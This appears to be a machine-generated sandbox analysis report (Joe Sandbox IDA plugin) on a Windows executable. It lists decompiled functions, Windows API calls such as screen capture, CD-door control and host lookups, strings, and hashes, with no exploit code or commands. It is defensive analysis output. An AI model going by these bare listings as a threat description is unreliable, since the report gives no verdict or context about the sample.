                                                                                                                                                    • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                                                                                                    • Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                                                                                                                    • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                                                                                                    Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                                                                    • __swprintf.LIBCMT ref: 00460915
                                                                                                                                                    • __swprintf.LIBCMT ref: 0046092D
                                                                                                                                                    • _wprintf.LIBCMT ref: 004609E1
                                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                    • API String ID: 3631882475-2268648507
                                                                                                                                                    • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                                                                    • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                                                                                                    • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                                                                    • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                                                                                                    Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                                                                                                    • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                                                                                                    • SendMessageW.USER32 ref: 00471740
                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                                                                                                    • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                                                                                                    • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                                                                                                    • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                                                                                                    • SendMessageW.USER32 ref: 0047184F
                                                                                                                                                    • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                                                                                                    • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4116747274-0
                                                                                                                                                    • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                                                                    • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                                                                                                    • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                                                                    • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                                                                                                    Function 0046163E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                                                                                                                    • _wcslen.LIBCMT ref: 00461683
                                                                                                                                                    • __swprintf.LIBCMT ref: 00461721
                                                                                                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00461869
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004618A4
                                                                                                                                                    • GetParent.USER32(?), ref: 004618C3
                                                                                                                                                    • ScreenToClient.USER32(00000000), ref: 004618CA
                                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                                                                                                    • String ID: %s%u
                                                                                                                                                    • API String ID: 1899580136-679674701
                                                                                                                                                    • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                                                                    • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                                                                                                                    • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                                                                    • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                                                                                                                    Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDC.USER32(00000000), ref: 0043143E
                                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                                                                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                                                                                                    • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                                                                    • String ID: (
                                                                                                                                                    • API String ID: 3300687185-3887548279
                                                                                                                                                    • Opcode ID: cfc1d8c6a0823e7a49ed36632b2cd954b4a10292cfc1fb15d36a0f99b3ff0906
                                                                                                                                                    • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                                                                                                    • Opcode Fuzzy Hash: cfc1d8c6a0823e7a49ed36632b2cd954b4a10292cfc1fb15d36a0f99b3ff0906
                                                                                                                                                    • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                                                                                                    Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                                                                      • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                                                                    • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                                                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                    • API String ID: 1976180769-4113822522
                                                                                                                                                    • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                                                                    • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                                                                                                    • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                                                                    • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                                                                                                    Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 461458858-0
                                                                                                                                                    • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                                                                    • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                                                                                                    • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                                                                    • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                                                                                                    Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                                                                                                    • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004301D0
                                                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3969911579-0
                                                                                                                                                    • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                                                                    • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                                                                                                    • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                                                                    • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                                                                                                    Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 956284711-4108050209
                                                                                                                                                    • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                                                                    • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                                                                                                    • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                                                                    • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                                                                                                    Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                    • String ID: 0.0.0.0
                                                                                                                                                    • API String ID: 1965227024-3771769585
                                                                                                                                                    • Opcode ID: 7f5a35a4caea2a0363244511447d860b497c1f3f6669415181c210b9a0992ba1
                                                                                                                                                    • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                                                                                                    • Opcode Fuzzy Hash: 7f5a35a4caea2a0363244511447d860b497c1f3f6669415181c210b9a0992ba1
                                                                                                                                                    • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                                                                                                    Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: SendString$_memmove_wcslen
                                                                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                    • API String ID: 369157077-1007645807
                                                                                                                                                    • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                                                                    • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                                                                                                    • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                                                                    • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                                                                                                    Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetParent.USER32 ref: 00445BF8
                                                                                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                                                                                                    • __wcsicoll.LIBCMT ref: 00445C33
                                                                                                                                                    • __wcsicoll.LIBCMT ref: 00445C4F
                                                                                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
